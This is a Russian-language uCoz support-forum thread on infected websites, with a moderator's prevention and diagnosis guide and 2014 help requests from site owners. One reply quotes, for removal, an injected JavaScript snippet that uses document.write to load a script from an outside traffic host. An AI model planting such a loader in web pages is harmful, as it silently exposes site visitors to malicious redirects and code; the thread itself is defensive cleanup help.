|
Вирусы на сайтах
|
|
Сообщение # 1 |
22:08:04
21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт - Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.
- Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.
- В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса
- Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.
- Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.
Диагностика - Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров - Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
- Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)
Правила подачи заявки на диагностику и поиск вредоносного кода на сайте - Вы должны предоставить ссылку на сайт!
- Вы должны дать описание проблемы:
1) на какой странице сайта обнаруживается проблема (ссылка)
2) проблема обнаруживается только под логином или под гостем тоже
3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки
4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки
Полезные ссылки: Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:
Сообщение от Модератор форума
|
$Vladimir$
Сообщений: 7465
Сообщение # 1126 |
21:42:45
04 Мар 2014
srrpp15845, опишите возникшую проблему более подробно и предоставьте скриншот.
|
IgoRock0098
Сообщений: 9
Уровень замечаний:
Сообщение # 1127 |
21:54:27
04 Мар 2014
Здравствуйте. Помогите вылечить сайт. Были обнаружены ифрейм вирусы и яндекс прислал сообщение что сайт заражен. Как мне почистить сайт?
Сканирование показало, что на сайте присутствую вирусы
Сообщение отредактировал webanet - Вторник, 04 Мар 2014, 22:11:40
|
webanet
Сообщений: 24067
Сообщение # 1128 |
21:58:48
04 Мар 2014
IgoRock0098, очисти скрипт
http://usm-drept.ru/copyright.js
вредоносная часть
Код /*c9a98b*/
document.write('<script type="text/javascript" src="http://bkz.com.tr/traf.php?id=1514856"></script>');
/*/c9a98b*/
|
IgoRock0098
Сообщений: 9
Уровень замечаний:
Сообщение # 1129 |
22:03:30
04 Мар 2014
как мне защититься, уже не знаю какой пароль ставить. по логах никто не заходил на сайт
|
webanet
Сообщений: 24067
Сообщение # 1130 |
22:06:00
04 Мар 2014
IgoRock0098, доступ к файловому не логируется
меняем пароли на uid профиль на панель управления. и ставим сложнейший пароль на фтп. его запоминать не надо. можно перед каждым использованием новый ставить. и конечно же содержим компьютер в чистоте
|
IgoRock0098
Сообщений: 9
Уровень замечаний:
Сообщение # 1131 |
22:34:55
04 Мар 2014
спасибо проверка вирусов не выявила. 
|
Alex@Vurhis
Сообщений: 147
Сообщение # 1132 |
01:45:03
05 Мар 2014
Можете проверить сайт на наличие вредоносного кода и ифрейма?
сайт: http://russiananimeforum.cf/
также некоторые скрипты имеют весьма смутный оттенок:
Цитата http://s59.ucoz.net/src/gstoolbar2/js/tool.js, тип файла: javascript
• содержит сомнительный код, но НЕ вирус: ClamAV принимает за вирус PUA.Script.Packed-2 вспомогательную библиотеку jquery.js
• содержит сомнительный код, но НЕ вирус: ClamAV принимает за вирусы PUA.Script.Packed-1 некоторые безобидные упакованные javascript-библиотеки
|
webanet
Сообщений: 24067
Сообщение # 1133 |
01:58:24
05 Мар 2014
Alex@Vurhis, Цитата http://s59.ucoz.net/src/gstoolbar2/js/tool.js, тип файла: javascript
• содержит сомнительный код, но НЕ вирус: ClamAV принимает за вирус PUA.Script.Packed-2 вспомогательную библиотеку jquery.js
если вы посещаете онлайн проверки, то логичнее всего искать помощи у создателей этих проверок, чтобы они очищали ваш сайт от результатов их проверок
http://s59.ucoz.net/src/gstoolbar2/js/tool.js это системный скрипт соц.бара юкоз. если вы хотите удовлетворить онлайн проверку, то снимите бар с сайта. но там вредоносного нет ничего
что вас сподвигло посетить онлайн проверки? у вас есть какие-либо проблемы?
|
Alex@Vurhis
Сообщений: 147
Сообщение # 1134 |
02:04:04
05 Мар 2014
Цитата webanet (  ) http://s59.ucoz.net/src/gstoolbar2/js/tool.js это системный скрипт соц.бара юкоз. если вы хотите удовлетворить онлайн проверку, то снимите бар с сайта. но там вредоносного нет ничего
Цитата webanet ( ) что вас сподвигло посетить онлайн проверки? у вас есть какие-либо проблемы?
Сообщение отредактировал Alex@Vurhis - Среда, 05 Мар 2014, 02:04:44
|
webanet
Сообщений: 24067
Сообщение # 1135 |
02:08:37
05 Мар 2014
Alex@Vurhis, ну тогда удалите битый скрипт
Код <script type="text/javascript" src="http://russiananimeforum.cf/js/ui.js"></script>
а так вроде чисто там куда я смогла дотянуться под гостем
|
Alex@Vurhis
Сообщений: 147
Сообщение # 1136 |
02:11:05
05 Мар 2014
Спасибо большое в очередной раз))
|
akula-z
Сообщений: 214
Сообщение # 1137 |
15:53:36
05 Мар 2014
Здравствуйте!
Столкнулась с такой проблемой на сайте. В материале на этой странице на слове отдых, в описании серии, появилась активная ссылка, которая ведет на какой-то другой сайт, но я ее там не ставила и вообще не знаю, как ее оттуда можно удалить? Когда смотрю хтмл код страницы, то там этой ссылки не вижу. Помогите удалить эту гадость!!!
А в материале на этой странице, стоит ссылка на слово дети, которая тоже ведет на сайт мир тесен! Подозреваю, что кто-то воспользовался моим аккаунтом и размещает на сайте эту рекламу. Но как с этим бороться, не знаю?
ПОМОГИТЕ!!!
|
сondor
Сообщений: 4661
Сообщение # 1138 |
17:13:39
05 Мар 2014
akula-z, не удалось ничего обнаружить. Попробуйте проверить через другой браузер, возможно что у браузера которым вы пользуетесь проблема с кэшем либо он заражен.
|
webanet
Сообщений: 24067
Сообщение # 1139 |
18:17:03
05 Мар 2014
akula-z, лечите браузер, компьютер
|
Gertryda5537
Сообщений: 1
Сообщение # 1140 |
13:01:56
07 Мар 2014
Здравствуйте. Помогите, найти вирус на сайте. вот саит http://cherry-pw.clan.su/ . Ругается антивирус Dr.Web Цитата
"Object","Threat","Action","Path",""
"adj?ref=&tz=-240&fl=12&pos=atf&w=468&h=60&s=95262","SCRIPT.Virus","Заблокирован","http://ads.betweendigital.com/adj?ref=&tz=-240&fl=12&pos=atf&w=468&h=60&s=95262"
Сообщение от Gertryda5537
|
Чат сообщества
)
